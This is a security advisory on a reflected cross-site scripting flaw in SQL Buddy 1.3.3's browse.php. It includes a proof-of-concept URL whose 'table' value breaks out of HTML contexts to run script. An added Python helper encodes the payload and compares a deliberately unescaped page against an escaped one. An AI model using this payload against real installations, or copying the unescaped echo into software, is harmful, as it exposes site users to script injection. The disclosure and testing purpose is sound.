XSS Vulnerability in SQL Buddy

Information

Advisory by Netsparker (now Invicti)
Name: XSS Vulnerabilities in SQL Buddy
Software: SQL Buddy v1.3.3 and possibly earlier versions.
Vendor Homepage: http://sqlbuddy.com/
Vulnerability Type: Cross-site Scripting
Severity: Critical
Researcher: Omar Kurt
Advisory Reference: NS-14-019

Description

SQL Buddy – Web-based MySQL administration

Details

SQL Buddy 1.3.3 is affected by reflected cross-site scripting: the `table` query-string parameter of browse.php is echoed into the response unencoded, so HTML and script supplied in the URL execute in the browser of anyone who opens it.
An example PoC URL is as follows:

  • Cross-site Scripting
    http://example.com/sqlbuddy/browse.php?ajaxRequest=89&db=information_schema&table=';"--></style></scRipt><scRipt>alert(0x000290)</scRipt> (Querystring)
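
The following Python is an added example and is not part of the original advisory or of SQL Buddy's code. It rebuilds the PoC URL above in the percent-encoded form a client actually sends, decodes the `table` value the way browse.php would receive it, and checks a response body for unescaped reflection. The two `render_*` functions are constructed stand-ins for a page that echoes the table name with and without output encoding; they are not SQL Buddy's templates, and the example base URL is the advisory's placeholder.

```python
"""Offline helper for the SQL Buddy browse.php reflected-XSS PoC (added example)."""
import html
import re
from urllib.parse import urlencode, urlsplit, parse_qs

# Payload from the advisory's PoC URL (the value of the `table` parameter).
PAYLOAD = "';\"--></style></scRipt><scRipt>alert(0x000290)</scRipt>"

# Matches an opening <script ...> tag in any letter case, as browsers do.
SCRIPT_TAG = re.compile(r"<\s*script\b", re.IGNORECASE)


def build_poc_url(base="http://example.com/sqlbuddy", db="information_schema", table=PAYLOAD):
    """Rebuild the advisory's PoC URL with the table value percent-encoded.

    The advisory prints the payload raw; urlencode produces the form a
    browser or HTTP client actually puts on the wire.
    """
    query = urlencode({"ajaxRequest": 89, "db": db, "table": table})
    return f"{base}/browse.php?{query}"


def table_param_as_received(url):
    """Decode the `table` value exactly as the PHP side would see it in $_GET."""
    return parse_qs(urlsplit(url).query, keep_blank_values=True)["table"][0]


def reflected_unescaped(body, payload=PAYLOAD):
    """True if the payload appears verbatim in the response, i.e. no output encoding."""
    return payload in body


def has_live_script_tag(body):
    """True if the body contains a real (unescaped) <script> opening tag."""
    return SCRIPT_TAG.search(body) is not None


# Constructed stand-ins for a vulnerable and a fixed page (not SQL Buddy's templates).

def render_vulnerable(table):
    """Echoes the table name straight into HTML: the behaviour the PoC exploits."""
    return f"<html><body><h1>Table: {table}</h1></body></html>"


def render_fixed(table):
    """Same page with output encoding appropriate for an HTML text node."""
    return f"<html><body><h1>Table: {html.escape(table, quote=True)}</h1></body></html>"


if __name__ == "__main__":
    url = build_poc_url()
    print("PoC URL as sent:   ", url)
    print("table as received: ", table_param_as_received(url))
    for name, render in (("vulnerable", render_vulnerable), ("fixed", render_fixed)):
        body = render(table_param_as_received(url))
        print(f"{name}: reflected_unescaped={reflected_unescaped(body)} "
              f"live_script_tag={has_live_script_tag(body)}")
```

Note that `html.escape` is the right fix only when the value lands in an HTML text node or quoted attribute. The `--></style></scRipt>` fragments in the payload are there to break out of comment, style and script contexts as well; a value reflected inside a `<script>` or `<style>` block needs context-specific encoding (or should not be reflected there at all), and a checker against a live target should run the reflection test on the real response rather than on these stand-ins.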
Advisory Timeline

22/04/2014 – First Contact
05/06/2014 – Advisory Released

Credits

This vulnerability was discovered while testing with Invicti Web Application Security Scanner.

About Invicti

Invicti can find and report security issues such as SQL Injection and Cross-site Scripting (XSS) in all web applications regardless of the platform and the technology they are built on.